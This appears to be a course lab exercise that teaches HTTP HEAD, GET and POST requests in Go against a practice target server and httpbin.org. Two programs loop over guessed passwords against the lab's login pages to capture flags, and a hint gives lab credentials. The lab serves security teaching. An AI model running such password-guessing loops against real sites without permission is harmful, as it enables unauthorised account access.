On your Linux server, in a Terminal window, execute these commands:
mkdir -p work/src/my_project/head1
nano ~/work/src/my_project/head1/head1.go
In nano, enter this code,
as shown below.
package main
import ( "net/http"; "fmt"; "io/ioutil" )
func main() {
resp, err := http.Head("http://target1.bowneconsulting.com")
if err != nil {
fmt.Println("Error: ", err)
}
defer resp.Body.Close()
for k, v := range resp.Header {
fmt.Printf("%s: %s\n", k, v)
}
body, err := ioutil.ReadAll(resp.Body)
fmt.Printf("\nResponse Body:\n%s\n", body)
}
Save the file with Ctrl+X, Y, Enter.
Execute these commands to compile the program and run it:
go install my_project/head1
head1
The program runs,
returning header fields, but no
body,
as shown below.
These are HTTP response headers, showing that my server is running Apache on Ubuntu.
On your local computer, in a Web browser, go to:
The request your browser sent to the server appears, as shown below.
Notice the "User-Agent" header, which sends information about your browser to the server. I used Mozilla Firefox on a Mac--your User-Agent may be different.
On your Linux server, in a Terminal window, execute these commands:
mkdir -p work/src/my_project/get0
nano ~/work/src/my_project/get0/get0.go
In nano, enter this code,
as shown below.
package main
import ( "net/http"; "fmt"; "io/ioutil" )
func main() {
resp, err := http.Get("http://httpbin.org/get")
if err != nil {
fmt.Println("Error: ", err)
}
defer resp.Body.Close()
body, err := ioutil.ReadAll(resp.Body)
bodyString := string(body)
fmt.Printf("Response:\n%s\n", bodyString)
}
Save the file with Ctrl+X, Y, Enter.
Execute these commands to compile the program and run it:
go install my_project/get0
get0
The program runs,
returning the page body,
as shown below.
It shows the request Go sent to the server, with a User-Agent of "Go-http-client/1.1".
mkdir -p work/src/my_project/get1
nano ~/work/src/my_project/get1/get1.go
In nano, enter this code,
as shown below.
package main
import ( "net/http"; "fmt"; "io/ioutil" )
func main() {
resp, err := http.Get("http://target1.bowneconsulting.com")
if err != nil {
fmt.Println("Error: ", err)
}
defer resp.Body.Close()
body, err := ioutil.ReadAll(resp.Body)
bodyString := string(body)
fmt.Printf("Response:\n%s\n", bodyString)
}
Save the file with Ctrl+X, Y, Enter.
Execute these commands to compile the program and run it:
go install my_project/get1
get1
The program runs,
returning the page body,
as shown below.
A new tab opens, showing the result. The username and password appear in the address bar, as shown below.
This is an unsafe but simple way to transmit credentials.
http://target1.bowneconsulting.com/php/login1.php?u=foo&p=bar
Let's make a Go script to perform this login.
On your Linux server, in a Terminal window, execute these commands:
mkdir -p work/src/my_project/get2
nano ~/work/src/my_project/get2/get2.go
In nano, enter this code,
as shown below.
package main
import ( "net/http"; "fmt"; "io/ioutil" )
func main() {
resp, err := http.Get("http://target1.bowneconsulting.com/php/login1.php?u=foo&p=bar")
if err != nil {
fmt.Println("Error: ", err)
}
defer resp.Body.Close()
body, err := ioutil.ReadAll(resp.Body)
bodyString := string(body)
fmt.Printf("Response:\n%s\n", bodyString)
}
Save the file with Ctrl+X, Y, Enter.
Execute these commands to compile the program and run it:
go install my_project/get2
get2
The program runs,
returning the page body,
including the "Login Rejected!"
message,
as shown below.
On your Linux server, in a Terminal window, execute these commands:
mkdir -p work/src/my_project/get3
nano ~/work/src/my_project/get3/get3.go
In nano, enter this code,
as shown below.
package main
import ( "net/http"; "fmt"; "io/ioutil" )
func main() {
username := "dumbo"
passwords := []string{"goofy", "mickey", "dumbo"}
url := "http://target1.bowneconsulting.com/php/login1.php?u="
for i, p := range passwords {
fmt.Printf("\nGuess %d: %s\n", i, p)
resp, err := http.Get(url + username + "&p=" + p)
if err != nil {
fmt.Println("Error: ", err)
}
defer resp.Body.Close()
body, err := ioutil.ReadAll(resp.Body)
bodyString := string(body)
fmt.Printf("Response:\n%s\n", bodyString)
}
}
Save the file with Ctrl+X, Y, Enter.
Execute these commands to compile the program and run it:
go install my_project/get3
get3
The output includes the flag,
as shown below.
Log in with a username of foo and a password of bar in the form below:
A new tab opens, showing the result.
Notice at the URL no longer includes the username or password. They are transmitted in a separate "form" section, as shown below.
mkdir -p work/src/my_project/post1
nano ~/work/src/my_project/post1/post1.go
In nano, enter this code,
as shown below.
package main
import ( "net/http"; "fmt"; "io/ioutil"; "net/url")
func main() {
target := "http://httpbin.org/post"
resp, err := http.PostForm( target, url.Values{ "u": {"foo"}, "p": {"bar"} } )
if err != nil {
fmt.Println("Error: ", err)
}
defer resp.Body.Close()
body, err := ioutil.ReadAll(resp.Body)
bodyString := string(body)
fmt.Printf("Response:\n%s\n", bodyString)
}
Save the file with Ctrl+X, Y, Enter.
Execute these commands to compile the program and run it:
go install my_project/post1
post1
The program runs,
showing the form parameters,
as shown below.
A new tab opens, showing the result. Notice that the URL ends in login2.php, as shown below.
On your Linux server, in a Terminal window, execute these commands:
mkdir -p work/src/my_project/post2
nano ~/work/src/my_project/post2/post2.go
In nano, enter this code,
as shown below.
package main
import ( "net/http"; "fmt"; "io/ioutil"; "net/url" )
func main() {
username := "dumbo"
passwords := []string{"goofy", "mickey", "dumbo"}
target := "http://target1.bowneconsulting.com/php/login2.php?u="
for i, p := range passwords {
fmt.Printf("\nGuess %d: %s\n", i, p)
resp, err := http.PostForm( target, url.Values{ "u": {username}, "p": {p} } )
if err != nil {
fmt.Println("Error: ", err)
}
defer resp.Body.Close()
body, err := ioutil.ReadAll(resp.Body)
bodyString := string(body)
fmt.Printf("Response:\n%s\n", bodyString)
}
}
Save the file with
Ctrl+X, Y,
Enter.
Execute these commands to compile the program and run it:
go install my_project/post2
post2
The output includes the flag,
as shown below.
http://target1.bowneconsulting.com/php/login3.php
with these parameters:
Hints:
http://target1.bowneconsulting.com/protected/A2.3/index.php
It's protected by Basic authenticatin, with a username of admin and a password of P@ssw0rd
The server will reply with a flag.
http://target1.bowneconsulting.com/protected/A2.4
with these parameters:
Posted: 11-3-19
Challenge numbers fixed 2-22-2020